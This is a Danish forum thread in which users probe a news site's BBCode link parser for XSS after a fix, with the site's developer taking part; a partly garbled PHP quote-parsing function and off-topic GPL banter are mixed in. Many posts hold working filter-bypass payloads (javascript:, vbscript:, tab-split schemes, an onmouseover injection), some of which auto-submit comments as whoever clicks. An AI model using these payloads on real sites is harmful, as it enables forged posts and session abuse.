mboost-dp1
Test!
Egentlig lidt farligt med de JS links... Man kunne forestille sig at ondsindede personer kunne stjæle login cookies på den måde..
reefermadness (51) skrev:Egentlig lidt farligt med de JS links... Man kunne forestille sig at ondsindede personer kunne stjæle login cookies på den måde..
Så er det godt det er blevet fixet, udover det kan man ikke rigtig bruge en anden persons login cookies til noget, medmindre man sidder på samme IP og er usandsynligt god til at gætte.
#53 - Okay, jeg ved ikke hvordan i håndterer det serverside, men jeg går ud fra at selve passwordet er med i cookien? (encodet i et eller andet selvfølgelig)
Men øv at det er fikset, jeg ville godt have at vide at jeg er pænt lidt flere gange :(
edit:
[url=JAVaScRIPT:$('#id_comment').val('jeg lugter af prut. ps rfrmdns er en pæn fyr');document.getElementById('id_commentpost').parentNode.parentNode.parentNode.parentNode.parentNode.submit();void(0);]Er det nu også fixet mandalae?[/url]
edit2: ja det er det :(
Men øv at det er fikset, jeg ville godt have at vide at jeg er pænt lidt flere gange :(
edit:
[url=JAVaScRIPT:$('#id_comment').val('jeg lugter af prut. ps rfrmdns er en pæn fyr');document.getElementById('id_commentpost').parentNode.parentNode.parentNode.parentNode.parentNode.submit();void(0);]Er det nu også fixet mandalae?[/url]
edit2: ja det er det :(
Det er godt, drenge. Hjælp lige mandalae med at perfektisere quoten!
static function quoteCallBackLoop($text, $start = 0, $posArr = array()){
preg_match( "/\
+?)\)(=.+?,.+?)?\](.+?)\[\/quote\](?!((.*?)\[\/quote\]))/
s", $text, $match, null, $start);
$pos = strpos($text, $match[0], $start);
if ($pos !== false && !in_array($pos, $posArr) && strlen($match[0]) > 0){
array_push($posArr, $pos);
return Z4_Parse::quoteCallBackLoop($text, $pos+1, $posArr);
} else {
if (count($posArr) > 0) {
$posi = array_pop($posArr);
$newpos = isset($posArr[count($posArr)-1]) ? $posArr[count($posArr)-1] : 0;
$end = strpos($text, '(.+?)? \(([0-9
') - $posi + 8;
$str = substr($text, $posi, $end);
$baseStr = preg_replace( "/\[quote=(.+?)? \(([0-9]+?)\)(=.+?,.+?)?\](.+?)\[\/quote\](?!((.*?)\[\/qu
ote\]))/s", '</p><blockquote cite="\\1 (#\\2)"><p>\\4 <cite><a href="#\\2">\\1 (#\\2)</a></cite></p></blockquote><p>', $str);
$text = substr_replace($text, $baseStr, $posi, $end);
return Z4_Parse::quoteCallBackLoop($text, $newpos, $posArr);
} else {
return $text;
}
}
}
#56 - Det var altid noget :)
Jeg tror ikke helt det er fikset, fik lige en idé da jeg stod i køen i netto... prøver lige:
[url=javascript:javascript:alert('test');]test[/url]
edit: Den er ikke helt i vinkel mandalae.. :|
Jeg tror ikke helt det er fikset, fik lige en idé da jeg stod i køen i netto... prøver lige:
[url=javascript:javascript:alert('test');]test[/url]
edit: Den er ikke helt i vinkel mandalae.. :|
milandt (58) skrev:reefermadness (57) skrev:#56 - Det var altid noget :)
Jeg tror ikke helt det er fikset, fik lige en idé da jeg stod i køen i netto... prøver lige:
[url=javascript:javascript:alert('test');]test[/url]
edit: Den er ikke helt i vinkel mandalae.. :|
... Men koncentrér dig nu bare om quote systemet, det virker umiddelbart som om at det er den der forsager flest grå hår på dit hovede :).. folk må bare lære at kigge på de links de åbner!
Ps. [url=javascript:javascript:$('#id_comment').val('Ja det er du reefermadness <3');document.getElementById('id_commentpost').parentNode.parentNode.parentNode.parentNode.parentNode.submit();void(0);]Jeg er stadig en pæn fyr[/url]
Ps. [url=javascript:javascript:$('#id_comment').val('Ja det er du reefermadness <3');document.getElementById('id_commentpost').parentNode.parentNode.parentNode.parentNode.parentNode.submit();void(0);]Jeg er stadig en pæn fyr[/url]
arne_v (15) skrev:Saxov (9)args)
altså, fx:i++;
ellerpublic void main(String[ skrev:Saxov (9) skrev:[quote=lundse (8)]
Humans: 1
Fascists: 0
Eller måske nærmere
dictators: 1
Fascists: 0
Hvis du ynder at bruger ordert facist.
For prøv at læse GPL'en.
Her tænker jeg specielt påGPL License skrev:
0. Definitions
~snip~
To “modify” a work means to copy from or adapt all or part of the work in a fashion requiring copyright permission, other than the making of an exact copy. The resulting work is called a “modified version” of the earlier work or a work “based on” the earlier work.
GPL Licence
altså, fx:i++;
ellerpublic void main(String[] args)
Sammen med GPL stk. 5 gør at bruger du ovenstående code snips, skal dit program være GPL licenseret.
Nu har de rettens ord for at den holder. Og nu skal vi nok se GPL retsag, på retsag, hvor de forsvarer at "en part" af deres program, fx ";" er at finde i forskellige closed source projekter, og de closed source derfor skal frigives som GPL.
reefermadness (60) skrev:... Men koncentrér dig nu bare om quote systemet, det virker umiddelbart som om at det er den der forsager flest grå hår på dit hovede :).. folk må bare lære at kigge på de links de åbner!
Ps. [url=javascript:javascript:$('#id_comment').val('Ja det er du reefermadness <3');document.getElementById('id_commentpost').parentNode.parentNode.parentNode.parentNode.parentNode.submit();void(0);]Jeg er stadig en pæn fyr[/url]
Det er noget vigtigere at man ikke kan køre scripts på siden :)
Quote systemet har altid været buggy så det ved folk, jeg skal nok fixe det. Min funktion fra tidligerer fungerer fint nok, den går bare i uendelig løkke i et eller andet tilfælde, jeg kan bare ikke lige gennemskue hvornår :)
[/quote] [/quote]XorpiZ (2) skrev:MiniatureZeus (1) skrev:Det test er test så test lang test tid test siden test der test sidshergammeldags test test test tråd test her test på test newz.dk test !
Så test bare test test test løs!
Test #1
Hvis man kigger det slamhtml vi får leveret er der en <cite> for meget i det der hører til #4 og det ser ud til at høre til den ødelagte ' [ quote=Saxov (9) '
reduceret html:
<p></p>
<blockquote cite="arne_v (#15)">
<blockquote>
<p>
Sammen med GPL stk. 5 gør at bruger du ovenstående code snips, skal dit program være GPL licenseret.<br/>
Nu har de rettens ord for at den holder. Og nu skal vi nok se GPL retsag, på retsag, hvor de forsvarer at "en part" af deres program, fx ";" er at finde i forskellige closed source projekter, og de closed source derfor skal frigives som GPL.
<cite>
Saxov (9)<br/>
altså, fx:
</p>
</blockquote>
<p></p>
Ja, 'Saxov (9)' quoten i Slemmebirks indlæg bliver accepteret selv om den mangler en slut ] og den efter følgende linie tages med i quote-kilden.
Nu virker det som om problemet er løst med javascript:
Men man kan stadig bruge vbscript: i IE.. eksempel:
[url=vbscript:MsgBox("Mandalae kommer ikke til at holde weekend")-void(0)]VIRKER KUN I IE![/url]
Men man kan stadig bruge vbscript: i IE.. eksempel:
[url=vbscript:MsgBox("Mandalae kommer ikke til at holde weekend")-void(0)]VIRKER KUN I IE![/url]
Kan også stadig med javascript:
[url=javascript: javascript:alert("Mandalae kommer ikke til at holde weekend");]Javascript[/url]
[url=javascript: javascript:alert("Mandalae kommer ikke til at holde weekend");]Javascript[/url]
Kan STADIG med javascript:
[url=vbscript:javascript:alert("Mandalae kommer ikke til at holde weekend");]Javascript[/url]
[url=vbscript:javascript:alert("Mandalae kommer ikke til at holde weekend");]Javascript[/url]
#78
Paint.NET v3.5.3? Virkelig? Hvorfor ikke Photoshop, når du nu var i gang! :P
Paint.NET v3.5.3? Virkelig? Hvorfor ikke Photoshop, når du nu var i gang! :P
#80 - Øv er det fake? håbede lige at jeg kunne browse newz på russisk med fede bannere og avatars :D
Daniel-Dane (80) skrev:#78
Paint.NET v3.5.3? Virkelig? Hvorfor ikke Photoshop, når du nu var i gang!
Fordi jeg ikke har en original photoshop...
reefermadness (81) skrev:#80 - Øv er det fake? håbede lige at jeg kunne browse newz på russisk med fede bannere og avatars :D
Desværre, jeg havde blot for meget tid :-)
#82 - Jeg er dybt dybt såret og krænket! Du bliver sku nød til at få Thøger Seidenfaden til at undskylde på din og danmarksbefolkningens vejne.!
[url]javascript:alert('Ja, men denne gang kan jeg kun sådan her, dvs. ved at bruge forkert syntax på URL tagget');[/url] ... Ikke så farligt da det er tydeligt hvad linket gør...
Denne her virker kun i IE (testet i IE8)
[url=javascript :alert('Virker kun i IE...');]kun i IE[/url]
Jeg har et par ekstra idéer i ærmet, men dem gemmer jeg til en eventuel aprilsnar :P
[url=javascript :alert('Virker kun i IE...');]kun i IE[/url]
Jeg har et par ekstra idéer i ærmet, men dem gemmer jeg til en eventuel aprilsnar :P
Jeg kan ikke komme på flere der virker i firefox, men fordi at IE åbenbart fjerner/ignorerer TAB karakterer fra links så kan en hvilkensomhelst kombination med tab bruges.. f.eks:
[url=java script:alert('test');]Eksempel[/url]
I firefox virker det sådan set også næsten, men når man sætter et tab ind i firefox bliver URL'en formet således javascript://alert('test');/ så javascripten er kommenteret bort ..
[url=java script:alert('test');]Eksempel[/url]
I firefox virker det sådan set også næsten, men når man sætter et tab ind i firefox bliver URL'en formet således javascript://alert('test');/ så javascripten er kommenteret bort ..
Denne her har potentiale til at være farlig... Kunne ikke få den til at se uskyldig ud trods mange forsøg, og nu er jeg træt.. sov godt :)
[url=# ]http://onmouseover=$('#id_comment').val('jeg%20lugter%20af%20prut.%20ps%20rfrmdns%20er%20en%20pæn%20fyr');document.getElementById('id_commentpost').parentNode.parentNode.parentNode.parentNode.parentNode.submit();void(0);//] test [/url]
[url=# ]http://onmouseover=$('#id_comment').val('jeg%20lugter%20af%20prut.%20ps%20rfrmdns%20er%20en%20pæn%20fyr');document.getElementById('id_commentpost').parentNode.parentNode.parentNode.parentNode.parentNode.submit();void(0);//] test [/url]
Opret dig som bruger i dag
Det er gratis, og du binder dig ikke til noget.
Når du er oprettet som bruger, får du adgang til en lang række af sidens andre muligheder, såsom at udforme siden efter eget ønske og deltage i diskussionerne.
- Forside
- ⟨
- Forum
- ⟨
- Tagwall
Gå til bund